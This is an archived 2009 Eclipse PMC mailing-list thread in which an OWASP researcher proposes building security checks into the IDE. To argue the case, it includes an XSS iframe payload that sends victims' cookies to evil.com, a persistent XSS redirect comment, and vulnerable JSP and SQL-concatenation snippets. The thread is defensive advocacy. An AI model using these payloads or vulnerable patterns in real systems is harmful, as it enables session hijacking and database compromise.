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RE: [eclipse-pmc] Project proposal on application security
The Technology PMC looks like a good group to start with. To be clear, I didn't want to subvert the normal integration process and shortcut an Eclipse project right into the default installation. My main concern was that it's integration path would be blocked by those who are not "sold" on the need for application security.
The utility of such a project is on us to prove, but it's not worth undertaking if there isn't a top-down-thumbs-up on the commitment to security.
From: eclipse-pmc-bounces@xxxxxxxxxxx on behalf of Mike Milinkovich
Sent: Wed 8/5/2009 10:38 AM
To: eclipse-pmc@xxxxxxxxxxx
Subject: RE: [eclipse-pmc] Project proposal on application security
The Eclipse community has historically and understandably been cautious
about committing to put new technologies into the platform. New technologies
have to demonstrate their utility, robustness and scalability before they
migrate there.
I think the project you are discussing is extremely exciting, and would be a
great addition to Eclipse. Security is a hugely important topic, and more
investment in that area at Eclipse can only be good for our community and
our platform. But the best path into our community is not necessarily via
the Eclipse PMC.
I would suggest creating a proposal for a new incubator project, likely
under the Technology PMC, and getting started. Target shipping in the first
release train you are ready for and then take it from there.
I hope that helps!
Mike Milinkovich
Executive Director, Eclipse Foundation
Office: +1.613.224.9461 x228
Mobile: +1.613.220.3223
> -----Original Message-----
> From: eclipse-pmc-bounces@xxxxxxxxxxx
> On Behalf Of Arshan Dabirsiaghi
> Sent: August-05-09 10:18 AM
> To: eclipse-pmc@xxxxxxxxxxx
> Subject: RE: [eclipse-pmc] Project proposal on application security
> I agree, sort of. J2EE applications definitely run into security problems
> often because the web and it's threats are not very well understood - but
> security is not a property of just the web, or SQL. I just tried to pick a
> examples that would be palatable and showed the need for static analysis.
> My main interest is preventing obvious security problems with validators,
> strong static analysis, and any number of Eclipse's other
> IDE capabilities. Different languages would have different security rules,
> since the language APIs are abusable in different ways. The AST is
> generalized, right? That's just not just a "Java thing"?
> In summary, I wouldn't mind if this was a "web" project, but we could gain
> lot from having general static analysis capability. Consider a readLine()
> on a socket - or someone using MessageDigest with MD2. Those things are
> specific to the web. Our organization focuses on web stuff, but not
> exclusively and only because that's where attackers are right now.
> Arshan
> ________________________________
> From: eclipse-pmc-bounces@xxxxxxxxxxx on behalf of John Arthorne
> Sent: Tue 8/4/2009 10:06 PM
> To: eclipse-pmc@xxxxxxxxxxx
> Subject: RE: [eclipse-pmc] Project proposal on application security
> Arshan, from your description I'm not sure the Eclipse project is the
> place for this. The project name is a bit misleading, but the Eclipse top-
> level project is concerned with generic language-agnostic IDE
> and with general Java SE development tools [1]. If there is a generic IDE
> aspect to the kind of security tools you have in mind, they may belong in
> Eclipse top-level project, but your examples seem to be specific to web
> development, and/or SQL development. Tools for web and SQL programming are
> found in separate projects: Web Tools [2], and Data Tools [3].
> John
> [1] http://eclipse.org/eclipse/
> [2] http://eclipse.org/webtools/
> [3] http://www.eclipse.org/datatools/
> "Arshan Dabirsiaghi" <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> Sent by: eclipse-pmc-bounces@xxxxxxxxxxx
> 08/04/2009 06:24 PM
> Please respond to
> eclipse-pmc@xxxxxxxxxxx
> To
> <eclipse-pmc@xxxxxxxxxxx>
> cc
> wayne.beaton@xxxxxxxxxxx
> Subject
> RE: [eclipse-pmc] Project proposal on application security
> Wow this turned out to be a long email! I hope it's not overwhelming. My
> is always on, and I'm always willing to talk if there's any confusing
> here. Anyway, I hope you brought coffee.
> First, let me talk explain why Equinox and Sword4J aren't exactly what's
> to help average Joe Web Developer.
> The Equinox and Sword4J projects seem focused on J2SE code security and
> trusted libraries (among other things less relevant). In all of the
> assessments I've done of web applications, these are not realistic threats
> attackers. I don't need to control your server-side code, as an attacker,
> abuse an application. It's usually quite possible to trick the developers'
> custom code in order to subvert the security of the application in one
> dimension or another. To show how unrealistic the problems that Sword4J
> Equinox solve are, consider that most applications don't even run with a
> SecurityManager and I've yet to run into a customer who has regretted that
> fact (or even understood why it might be a problem). We have a long way to
> until those are the projects that solve our biggest security concerns.
> A summary of the greatest threats to web applications specifically is
> by OWASP every couple of years [1] in the "Top 10" series. As you can see
> the page I've referenced, this "standard" for realistic threats is used by
> many organizations, including government agencies, financial companies,
> organizations from just about every vertical. Unfortunately, none of the
> issues cited in the OWASP Top 10 are solved by Equinox and Sword4J. I
> want to seem like I'm discrediting their work; trusted code is important
> some formal assurance models, but we can help developers fix the
> vulnerabilities that they are creating right now, every day.
> Let's take 2 of the 10 most prevalent and most easily exploitable
> vulnerabilities in applications today, cross-site scripting and SQL
> and see how the Eclipse IDE can prevent them from ever happening.
> Cross-site scripting
> My company's assessment data shows that over 90% of web applications are
> vulnerable to XSS, and often quite thoroughly. There is public data that
> the number somewhere around 70%, but that data is only generated by
> tools, and human analysis tends to turn up many more vulnerabilities than
> automated analysis.
> A developer can introduce a cross-site scripting flaw (of which there are
> variants) in a single line of code:
> Your search for "<%= request.getParameter("searchValue") %>" produced
> results!
> It also may take another form in JSP EL:
> Your search for ${myStrutsSearchForm.searchValue} produced ${num} results!
> These are two examples of where user-supplied code is reflected directly
> an HTML response after a search. This pattern is actually all it takes to
> allow attackers to perform privilege escalation, phishing, keylogger
> installation and a host of other really bad things. Imagine you were
> into the site in question, and then visited my malicious page in another
> browser tab. My page then gives you this HTML:
> <iframe src="http://victimsite.com/search.do?searchValue=<script>new
> Img().src='http://evil.com/'+document.cookie;</script>">
> Seeing this HTML will cause your browser to issue a request from the
> browser to the victimsite's search action. When the search action is
> the view from the JSP, it will include the user-supplied parameter, which
> contains JavaScript that sends the user's cookies to an evil site,
> All the attacker has to do is watch his web logs on evil.com and stick the
> victim's cookies from them into his own browser in order to become the
> user.
> It's that easy! Now let's consider another, more brutal type of cross-site
> scripting, called persistent cross-site scripting. Imagine Alice runs a
> called AlicesBlog.com. Since most blogs allow comments either registered
> unregistered, Mallory posts a comment on Alice's latest post:
> Hey Alice, I love your posts!! Keep up the good
> work!!<script>document.location='http://evil.com'; <http://evil.com';/> </script>
> Depending on how comments are handled, this could be very bad for Alice.
> assume the worst case for brevity, and Alice does not moderate comments.
> any user sees Alice's latest post, Mallory's comment will be delivered as
> of the HTML response as generated by the JSP. Because Mallory's comment
> be interpreted as code and not data, the user's browser will execute the
> malicious script and redirect the user to a page exclaiming that they
> Alice's site. Alice then loses trust and credibility, because when a user
> navigates Alice's site, all they see is Mallory's apparent "defacement".
> reality, persistent XSS is used to harvest mass amounts of accounts and
> perform other malicious activity, and a defacement is frankly preferable
> the alternatives.
> How can the IDE help? Well, it can help in easy ways and hard ways. At the
> very least, a simple Validator could be used to detect request parameters
> headers) being directly reflected into the response. Simple checks could
> used to give the use an error when the following code is seen:
> <%=request.getParameter("foo")%>
> However, what about the following scenario?
> <%
> String param = request.getParameter("foo");
> %>
> ...
> <%= param + " results!!" %>
> This example shows that in order to catch this problem generally we need
to do
> data flow analysis (also called "taint tracking"), which is expensive
> computationally, even with all the AST functionality built into Eclipse.
> hard way = data flow analysis, easy way = simple Validators with grep.
> SQL Injection
> Consider the lifetime of the request parameter "foo" in the following set
> snippets:
> String untrusted_data = request.getParameter("foo");
> ...
> updateAccount(untrusted_data);
> ...
> public void updateAccount(String acctName) {
> String sql = "UPDATE foo SET name='" + acctName + "' WHERE id=2";
> Statement stmt = conn.creaStatement();
> stmt.executeQuery(sql);
> }
> As one can see, the request parameter, an untrusted value, is eventually
> to dynamically build a SQL statement. A user could enter in a value that
> altered the meaning of the SQL query in order to change all row values,
> other tables, gather data, and even destroy tables.
> A similar data flow analysis would be required to catch this bug.
> Alternatively,the Statement.executeQuery() API could be flagged as
> like the old C gets() method, and would throw compilation errors unless
> annotated appropriately.
> Since Eclipse manages can attach to runtime server processes (like Tomcat)
> also use dynamic testing capabilities to discover these issues with more
> advanced but computationally less expensive techniques. For example, you
> run your application locally within Eclipse+Tomcat, use AspectJ to taint
> data at runtime, and then setup hooks at dangerous "sinks" like JspWriter
> output methods and Statement.executeQuery to detect if tainted data (also
> called dangerous "sources") ever make it into one of them.
> If I had unlimited authority and developer time I could imagine lots of
> to introduce into the IDE for application security. These are the
> we'd have to answer before moving on:
> 1. What vulnerabilities do we want to prevent from occurring?
> 2. How are we going to let the user know about the flaw, and how can they
> override it?
> Once we know the answers to those two questions we can figure out what the
> best way to implement these checks could be. Again, sorry for the novel,
> the problem of application security is one that the world needs to figure
> quickly. We're building up a massive "security debt clock" and unlike our
> national debt, eventually we're going to have to pay for this one. You're
in a
> uniquely powerful position to prevent a large percentage of
> from occurring. It's easy to blame developers, but frankly they're never
> properly trained and security is the first thing to be thrown away on a
> regular budget. Attackers won't always have the easy options of buffer
> overflows and phishing - Gartner has showed that attacks are moving to the
> application layer [3] and it won't be long before the amount of incidents
> already see [4] grows at an astonishing rate.
> Thanks for listening!
> Cheers,
> Arshan
> [1] http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
> [2] http://www.slideshare.net/jeremiahgrossman/whitehat-security-website-
> security-statistics-report-q109
> [3]
> attack.aspx
> [4] http://www.xiom.com/whid-2009
> ________________________________
> From: eclipse-pmc-bounces@xxxxxxxxxxx on behalf of Jeff McAffer
> Sent: Tue 8/4/2009 1:32 PM
> To: eclipse-pmc@xxxxxxxxxxx
> Cc: wayne.beaton@xxxxxxxxxxx
> Subject: Re: [eclipse-pmc] Project proposal on application security
> Arshan,
> This sounds very interesting. It sounds related at least in part to some
> the work carried out in the Equinox security incubator.
> http://www.eclipse.org/equinox/incubator/security/
> There are several aspects of that work, some involving higher level
> (e.g., JAAS etc) and others static code analysis and Java2 permissions
> analysis using Sword4J
> http://www.alphaworks.ibm.com/tech/sword4j
> I don't know the current status of the Sword4J work but it might be a good
> place to start looking.
> In any event, it would be interesting to hear more about what you are
> proposing.
> Jeff
> Jeff McAffer | CTO | EclipseSource | +1 613 851 4644
> jeff@xxxxxxxxxxxxxxxxx | http://eclipsesource.com <http://eclipsesource.com/>
> On 4-Aug-09, at 10:23 AM, Arshan Dabirsiaghi wrote:
> Eclipse PMC,
> My name is Arshan and I'd like Eclipse to enable
developers to
> write more secure code. I'm working with the OWASP foundation and have
> elicited funds to accomplish the introduction of security into key points
> the technology stack with security analysis of application server
> vendor outreach programs, and more. I'm writing to ask you, however, about
> introducing security into your IDE (which happens to be my favorite IDE).
> The IDE is a very effective place for security to go since
> will necessarily catch problems earlier in the lifecycle than would
> security checks in other places. There a host of issues
> JDT can easily detect while developers are writing code, including:
> * Injection attacks (cross-site scripting, command
> injection, SQL injection, XPath/XML injection, etc.)
> * Information leakage
> * Cryptographic weakness
> * ...and many more!
> While a 3rd party plugin could technically perform these
> checks, having them in the IDE would greatly legitimize security in
> developers' eyes, since most view security problems as theoretical or
> bothersome. And the momentum is growing; it's not just the banks that are
> taking application security seriously anymore - the world is starting
> recognize that applications are part of your security perimeter. In fact,
> recently spoke at JavaOne about some specific security flaws the J2EE
world is
> continually producing.
> Other IDEs are getting into the game as well. Visual
> invested in CAT.NET, a tool used to help MS developers find security
> and IBM recently bought Ounce, a static analysis tool for finding security
> flaws. I do penetration testing, code review and security research for a
> living. The problems are out there in staggering numbers, and its only
> worse. Frankly, developers will keep re-introducing problems as long as
> IDE lets them.
> I'm proposing we create an Eclipse sub-project or extend a
> piece of the existing Eclipse base to allow users to enable security
> with customizable levels of interaction. As budget allows we are prepared
> take on the necessary expenses for implementing these features, but the
> commitment to developing more secure code can only come from your
> organization.
> We are very flexible on the logistical details and are
> eager to start a conversation around application security and Eclipse.
> Thanks for your time,
> Arshan Dabirsiaghi
> Director of R&D
> Aspect Security
> http://www.aspectsecurity.com <http://www.aspectsecurity.com/>
> O: (301) 604-4882
> C: (443) 791-5355
> Project Lead
> Intrinsic Security Working Group
> Open Web Application Security Project (OWASP)
> http://owasp.org <http://owasp.org/> <http://owasp.org/>
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